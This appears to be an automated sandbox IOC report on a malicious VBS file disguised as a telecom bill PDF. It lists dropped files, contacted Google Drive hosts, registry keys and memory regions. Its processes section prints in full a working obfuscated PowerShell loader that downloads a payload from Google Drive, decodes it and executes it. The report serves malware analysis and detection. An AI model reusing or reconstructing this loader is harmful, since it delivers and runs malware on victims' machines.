IOC Report
11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahap3lvc.vc2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv2plouf.aj4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Maskes.lea
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://pesterbdd.com/images/Pe
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.206
drive.usercontent.google.com
216.58.206.65

IPs

IP
Domain
Country
Malicious
142.250.185.206
drive.google.com
United States
216.58.206.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1D3D41D2000
trusted library allocation
page read and write
malicious
1D3C47A3000
trusted library allocation
page read and write
1D3C4161000
trusted library allocation
page read and write
1B80156C000
heap
page read and write
1D3C3E30000
heap
page readonly
1B801576000
heap
page read and write
1B8033D5000
heap
page read and write
7FF7C0B7D000
trusted library allocation
page execute and read and write
7FF7C0C90000
trusted library allocation
page execute and read and write
1D3DC5A0000
heap
page read and write
B04B877000
stack
page read and write
7FF7C0DF0000
trusted library allocation
page read and write
1B801585000
heap
page read and write
1B801490000
heap
page read and write
8F9E5FE000
stack
page read and write
7FF7C0E70000
trusted library allocation
page read and write
7FF7C0EB0000
trusted library allocation
page read and write
1D3C45E2000
trusted library allocation
page read and write
1B8033C8000
heap
page read and write
1D3C5DCE000
trusted library allocation
page read and write
1D3C3E10000
trusted library allocation
page read and write
1B803286000
heap
page read and write
B04BB7E000
stack
page read and write
1D3DC6C4000
heap
page read and write
7FF7C0D30000
trusted library allocation
page execute and read and write
7FF7C0DE0000
trusted library allocation
page read and write
7FF7C0DB0000
trusted library allocation
page read and write
7FF7C0C56000
trusted library allocation
page execute and read and write
1B8012C0000
heap
page read and write
1B801588000
heap
page read and write
1D3DC5A2000
heap
page read and write
1D3C4387000
trusted library allocation
page read and write
1B80157E000
heap
page read and write
1B80329E000
heap
page read and write
1B8016A5000
heap
page read and write
1D3C6033000
trusted library allocation
page read and write
1B803293000
heap
page read and write
1D3C4BCB000
trusted library allocation
page read and write
1B80155D000
heap
page read and write
1D3C2595000
heap
page read and write
1B801563000
heap
page read and write
1D3DC68A000
heap
page read and write
1D3C25DD000
heap
page read and write
1B8013C0000
heap
page read and write
1D3C23C0000
heap
page read and write
1D3C2510000
heap
page read and write
1B80156F000
heap
page read and write
7FF7C0D10000
trusted library allocation
page read and write
1B8032B6000
heap
page read and write
7FF7C0EF0000
trusted library allocation
page read and write
1B8014B8000
heap
page read and write
B04B18E000
stack
page read and write
7FF7C0B74000
trusted library allocation
page read and write
7FF7C0D52000
trusted library allocation
page read and write
1B8033A3000
heap
page read and write
B04B9FE000
stack
page read and write
1D3C24C0000
heap
page read and write
1B8033B2000
heap
page read and write
1B803396000
heap
page read and write
1D3C25B5000
heap
page read and write
1D3D4161000
trusted library allocation
page read and write
7FF7C0D60000
trusted library allocation
page execute and read and write
1B80155D000
heap
page read and write
7FF7C0EE0000
trusted library allocation
page read and write
7FF7C0E50000
trusted library allocation
page read and write
1B80158B000
heap
page read and write
1D3DC590000
heap
page execute and read and write
7FF7C0B8B000
trusted library allocation
page read and write
1D3DC660000
heap
page read and write
1D3C3F81000
heap
page read and write
B04BBFB000
stack
page read and write
1B803380000
heap
page read and write
1D3DC6A0000
heap
page read and write
1B80155F000
heap
page read and write
1B8014BA000
heap
page read and write
B04B5FC000
stack
page read and write
B04B978000
stack
page read and write
1B8014BE000
heap
page read and write
7FF7C0B80000
trusted library allocation
page read and write
7FF7C0BCC000
trusted library allocation
page execute and read and write
7FF7C0E60000
trusted library allocation
page read and write
1B8032E8000
heap
page read and write
1B801498000
heap
page read and write
1D3C3E25000
heap
page read and write
1B803290000
heap
page read and write
1B8032A7000
heap
page read and write
B04B1CF000
stack
page read and write
7FF7C0DD0000
trusted library allocation
page read and write
1D3D445B000
trusted library allocation
page read and write
1D3C4605000
trusted library allocation
page read and write
1D3DC814000
heap
page read and write
1D3D4170000
trusted library allocation
page read and write
1B8016A0000
heap
page read and write
1D3DC597000
heap
page execute and read and write
1B8014FE000
heap
page read and write
1B803281000
heap
page read and write
1D3C5DE1000
trusted library allocation
page read and write
1B801576000
heap
page read and write
8F9ECFE000
stack
page read and write
1D3DC7CA000
heap
page read and write
B04BA7E000
stack
page read and write
1B8014F2000
heap
page read and write
1D3C25E3000
heap
page read and write
1D3DC7A0000
heap
page read and write
B04B103000
stack
page read and write
1D3C4658000
trusted library allocation
page read and write
1B80328B000
heap
page read and write
B04B8F9000
stack
page read and write
1B8033B2000
heap
page read and write
1B8014F2000
heap
page read and write
1D3DC899000
heap
page read and write
1D3C3E40000
trusted library allocation
page read and write
1D3C3E20000
heap
page read and write
7FF7C0B70000
trusted library allocation
page read and write
1D3C5E4B000
trusted library allocation
page read and write
1D3C48B2000
trusted library allocation
page read and write
1B8033C4000
heap
page read and write
8F9EBFE000
stack
page read and write
1D3C5DB7000
trusted library allocation
page read and write
1B8014CE000
heap
page read and write
1B801577000
heap
page read and write
1B80329B000
heap
page read and write
1D3C24A0000
heap
page read and write
1D3C5DF4000
trusted library allocation
page read and write
7FF7C0D90000
trusted library allocation
page read and write
8F9E1AA000
stack
page read and write
1B803292000
heap
page read and write
1D3C5E0E000
trusted library allocation
page read and write
1D3C4B72000
trusted library allocation
page read and write
1D3D444C000
trusted library allocation
page read and write
1D3C4150000
heap
page execute and read and write
1B8014BF000
heap
page read and write
1D3C2515000
heap
page read and write
1D3DC610000
heap
page read and write
1B8014BB000
heap
page read and write
7FF7C0E10000
trusted library allocation
page read and write
1B801580000
heap
page read and write
1B803280000
heap
page read and write
1B80157A000
heap
page read and write
1D3DC840000
heap
page read and write
8F9E7FF000
stack
page read and write
7FF7C0C20000
trusted library allocation
page read and write
1B801565000
heap
page read and write
1B8032B6000
heap
page read and write
1D3C465C000
trusted library allocation
page read and write
B04B7FE000
stack
page read and write
1D3C45F1000
trusted library allocation
page read and write
7FF7C0C26000
trusted library allocation
page read and write
7FF7C0C2C000
trusted library allocation
page execute and read and write
1D3DC806000
heap
page read and write
1D3C3F7A000
heap
page read and write
1D3DC66B000
heap
page read and write
1D3C461A000
trusted library allocation
page read and write
1B801563000
heap
page read and write
1D3C45F5000
trusted library allocation
page read and write
1B8032B6000
heap
page read and write
1D3C55DB000
trusted library allocation
page read and write
1B8032AA000
heap
page read and write
1B80155D000
heap
page read and write
1B8014F2000
heap
page read and write
1B8033D5000
heap
page read and write
1B803396000
heap
page read and write
1B8014B9000
heap
page read and write
1D3C3DF0000
trusted library allocation
page read and write
1B803284000
heap
page read and write
1D3DC5C1000
heap
page read and write
1B8032B6000
heap
page read and write
1D3C5EB3000
trusted library allocation
page read and write
1B80156C000
heap
page read and write
7FF7C0EC0000
trusted library allocation
page read and write
1D3C480F000
trusted library allocation
page read and write
1D3C259B000
heap
page read and write
1D3D4181000
trusted library allocation
page read and write
7FF7C0B72000
trusted library allocation
page read and write
1D3C45D9000
trusted library allocation
page read and write
7FF7C0E30000
trusted library allocation
page read and write
1D3DC500000
heap
page read and write
7FF7C0B73000
trusted library allocation
page execute and read and write
B04B7F8000
stack
page read and write
1B8033A6000
heap
page read and write
7FF7C0E40000
trusted library allocation
page read and write
1D3DC7F3000
heap
page read and write
B04B4FE000
stack
page read and write
1D3C2520000
heap
page read and write
1D3DC6C1000
heap
page read and write
1B801578000
heap
page read and write
B04B67E000
stack
page read and write
1B80155D000
heap
page read and write
1B803292000
heap
page read and write
1D3C5DD9000
trusted library allocation
page read and write
1D3C3E70000
trusted library allocation
page read and write
7FF7C0E80000
trusted library allocation
page read and write
7FF7C0D70000
trusted library allocation
page read and write
1B8032B6000
heap
page read and write
1B8013A0000
heap
page read and write
7FF7C0E00000
trusted library allocation
page read and write
B04B47F000
stack
page read and write
7FF7C0D2A000
trusted library allocation
page read and write
1B8032E8000
heap
page read and write
1B8033CE000
heap
page read and write
1D3DCB20000
heap
page read and write
7FF7C0E90000
trusted library allocation
page read and write
B04C64D000
stack
page read and write
8F9EEFB000
stack
page read and write
8F9EAFD000
stack
page read and write
1D3C2599000
heap
page read and write
1D3DC872000
heap
page read and write
1B8033DB000
heap
page read and write
8F9E8FE000
stack
page read and write
1D3C4110000
heap
page execute and read and write
1B801522000
heap
page read and write
7FF7C0DC0000
trusted library allocation
page read and write
1D3C5970000
trusted library allocation
page read and write
1D3C5F64000
trusted library allocation
page read and write
1D3C5E63000
trusted library allocation
page read and write
1D3C45ED000
trusted library allocation
page read and write
7FF7C0D80000
trusted library allocation
page read and write
1B803383000
heap
page read and write
1B801660000
heap
page read and write
1D3C4BDB000
trusted library allocation
page read and write
1B8032B6000
heap
page read and write
8F9EDFE000
stack
page read and write
7FF7C0B90000
trusted library allocation
page read and write
1B8032E8000
heap
page read and write
1D3C25A3000
heap
page read and write
7FF7C0D40000
trusted library allocation
page execute and read and write
7FF7C0D21000
trusted library allocation
page read and write
1B8033C7000
heap
page read and write
7FF7C0E20000
trusted library allocation
page read and write
1B803382000
heap
page read and write
1B803288000
heap
page read and write
1D3C41E6000
trusted library allocation
page read and write
7FF7C0EA0000
trusted library allocation
page read and write
B04C5CE000
stack
page read and write
1D3C2550000
heap
page read and write
7FF7C0ED0000
trusted library allocation
page read and write
B04B57F000
stack
page read and write
1D3C459B000
trusted library allocation
page read and write
7DF4AC140000
trusted library allocation
page execute and read and write
7FF7C0DA0000
trusted library allocation
page read and write
1D3C5E4F000
trusted library allocation
page read and write
B04BAFF000
stack
page read and write
1D3C3F70000
heap
page read and write
1D3C3EB0000
trusted library allocation
page read and write
1D3C4806000
trusted library allocation
page read and write
1D3C5DBA000
trusted library allocation
page read and write
1B803293000
heap
page read and write
8F9E4FE000
stack
page read and write
B04B6FE000
stack
page read and write
1B8014B9000
heap
page read and write
B04B77E000
stack
page read and write
1D3C5DDD000
trusted library allocation
page read and write
There are 242 hidden memdumps, click here to show them.